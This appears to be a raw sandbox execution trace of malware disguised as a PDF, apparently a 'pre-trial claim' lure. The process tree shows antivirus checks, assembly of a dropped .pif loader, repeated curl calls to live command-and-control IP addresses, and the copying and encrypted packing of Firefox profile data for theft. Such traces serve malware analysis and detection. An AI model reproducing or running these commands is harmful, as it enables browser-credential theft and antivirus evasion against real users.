HTTP User-Agent header	148	curl/8.7.1
HTTP User-Agent header	111	curl/8.7.1
HTTP User-Agent header	231	curl/8.7.1
HTTP User-Agent header	267	curl/8.7.1
HTTP User-Agent header	67	curl/8.7.1
HTTP User-Agent header	104	curl/8.7.1
HTTP User-Agent header	157	curl/8.7.1
HTTP User-Agent header	271	curl/8.7.1
HTTP User-Agent header	106	curl/8.7.1
HTTP User-Agent header	124	curl/8.7.1
HTTP User-Agent header	172	curl/8.7.1
HTTP User-Agent header	178	curl/8.7.1
HTTP User-Agent header	236	curl/8.7.1
HTTP User-Agent header	41	curl/8.7.1
HTTP User-Agent header	90	curl/8.7.1
HTTP User-Agent header	224	curl/8.7.1
HTTP User-Agent header	52	curl/8.7.1

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3668
- C:\Users\Admin\AppData\Local\Temp\Передсудова претензія.pdf.exe
  "C:\Users\Admin\AppData\Local\Temp\Передсудова претензія.pdf.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:4168
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4104
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2848
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa opssvc"
      4⤵
      PID:4368
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4544
  - - C:\Windows\SysWOW64\findstr.exe
      findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
      4⤵
      PID:1488
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 226443
      4⤵
      PID:5056
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "AthleticsTabletsUserImaging" Slovenia
      4⤵
      PID:3128
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d
      4⤵
      PID:3204
  - - C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
      Crossword.pif d
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Checks computer location settings
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:4376
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\239 2>&1
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2876
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2172
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\239 > C:\Users\Admin\AppData\Local\temp\838
        5⤵
        
        PID:2548
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hjcev" "178.215.224.252/v10/ukyh.php?jspo=6"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4600
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\hjcev" "178.215.224.252/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2544
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sdbjn" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3272
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sdbjn" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4908
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pyffq" "178.215.224.74/v10/ukyh.php?jspo=5"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3232
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pyffq" "178.215.224.74/v10/ukyh.php?jspo=5"
        6⤵
        
        PID:3936
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\clbmk" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3872
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\clbmk" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3284
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rtjxe" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2532
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rtjxe" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4464
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pwjgu" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4324
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pwjgu" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
        6⤵
        
        PID:4580
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\uptqu" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3076
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\uptqu" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1140
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\twkjl" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3740
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\twkjl" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1864
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xvcvr" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
        5⤵
        
        PID:4968
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xvcvr" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
        6⤵
        
        PID:1552
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
        5⤵
        
        PID:1328
      - C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe
        
        azvw.exe -o xhwq.zip
        6⤵
        Executes dropped EXE
        
        PID:4644
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\imqcu" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4444
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\imqcu" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4680
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\buwok" "178.215.224.74/v10/ukyh.php?jspo=31"
        5⤵
        
        PID:2880
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\buwok" "178.215.224.74/v10/ukyh.php?jspo=31"
        6⤵
        
        PID:2720
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\DolphinDumps\jvx 2>&1
        5⤵
        
        PID:3020
      - C:\Windows\SysWOW64\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:4696
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /C:"OS Name"
        6⤵
        
        PID:1540
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ntlne" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5104
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ntlne" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4940
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\taciu" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3296
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\taciu" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3936
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rtdgl" "178.215.224.74/v10/ukyh.php?jspo=7"
        5⤵
        
        PID:3388
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rtdgl" "178.215.224.74/v10/ukyh.php?jspo=7"
        6⤵
        
        PID:4264
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\oumvg" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1156
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\oumvg" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iuouh" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
        5⤵
        
        PID:1560
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\iuouh" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
        6⤵
        
        PID:2196
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wacfa" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3720
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wacfa" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3628
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wwkto" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3256
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\wwkto" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3860
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\aseea" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
        5⤵
        
        PID:4020
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\aseea" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
        6⤵
        
        PID:5092
    - - C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe
        
        "C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1760
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
        6⤵
        
        PID:4384
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4168
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        7⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4668
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        7⤵
        
        PID:1540
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 303482
        7⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "OVERTOOLBARALOTNHL" Weeks
        7⤵
        
        PID:3708
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Norman + ..\Eight + ..\Considerations + ..\Bailey + ..\Parts + ..\Showcase + ..\Samples + ..\Shepherd + ..\Subsection f
        7⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\303482\Either.pif
        
        Either.pif f
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:2440
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sqpfb" "178.215.224.252/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\sqpfb" "178.215.224.252/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:520
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\alckm" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:5116
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\alckm" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:3388
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\phfdl" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\phfdl" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4508
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fodrn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"
        8⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fodrn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"
        9⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o qyup.zip
        8⤵
        
        PID:1240
        
        C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe
        
        azvw.exe -o qyup.zip
        9⤵
        Executes dropped EXE
        
        PID:660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fiiqz" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:3256
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fiiqz" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4352
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ezmmg" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ezmmg" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2284
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rlcta" "178.215.224.74/v10/ukyh.php?jspo=8"
        8⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rlcta" "178.215.224.74/v10/ukyh.php?jspo=8"
        9⤵
        
        PID:3584
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tuygx" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:4316
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\tuygx" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:848
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qccbz" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=80E79B56FCD3600852CF072C4FE866"
        8⤵
        
        PID:2880
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\qccbz" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=80E79B56FCD3600852CF072C4FE866"
        9⤵
        
        PID:1216
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ffbul" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:3564
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ffbul" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4344
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eqtve" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1308
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\eqtve" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3400
        
        C:\Windows\SysWOW64\Robocopy.exe
        
        robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:548
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rdgfa" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rdgfa" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\80E79B56FCD3600852CF072C4FE866_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
        8⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe
        
        C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\80E79B56FCD3600852CF072C4FE866_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4744
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\evibd" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\evibd" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\uyoev" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:4424
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\uyoev" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rxtkb" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=f88a9fa1356539069992c1411481ca83*6&jwvs=80E79B56FCD3600852CF072C4FE866"
        8⤵
        
        PID:2876
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rxtkb" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=f88a9fa1356539069992c1411481ca83*6&jwvs=80E79B56FCD3600852CF072C4FE866"
        9⤵
        
        PID:1780
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C rd /s /q "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
        8⤵
        
        PID:3236
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pbatm" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1964
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pbatm" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4560
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xuboy" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=80E79B56FCD3600852CF072C4FE866&bsxa=1"
        8⤵
        
        PID:3508
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xuboy" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=80E79B56FCD3600852CF072C4FE866&bsxa=1"
        9⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xwiqb" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:708
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xwiqb" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4344
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rmumi" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:1796
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rmumi" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\uiefs" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=f5003a727d0b726fbb1fd820c7fb361c*2&jwvs=80E79B56FCD3600852CF072C4FE866"
        8⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\uiefs" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=f5003a727d0b726fbb1fd820c7fb361c*2&jwvs=80E79B56FCD3600852CF072C4FE866"
        9⤵
        
        PID:844
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\whvnd" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4424
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\whvnd" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:4380
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pmbrz" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=80E79B56FCD3600852CF072C4FE866"
        8⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pmbrz" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=80E79B56FCD3600852CF072C4FE866"
        9⤵
        
        PID:784
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cwbju" "178.215.224.74/v10/ukyh.php?jspo=6"
        8⤵
        
        PID:2264
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\cwbju" "178.215.224.74/v10/ukyh.php?jspo=6"
        9⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rtpee" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3596
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\rtpee" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2380
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vesnf" "178.215.224.74/v10/ukyh.php?gi"
        5⤵
        
        PID:4680
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vesnf" "178.215.224.74/v10/ukyh.php?gi"
        6⤵
        
        PID:3580
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mlbqs" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1580
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\mlbqs" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3008
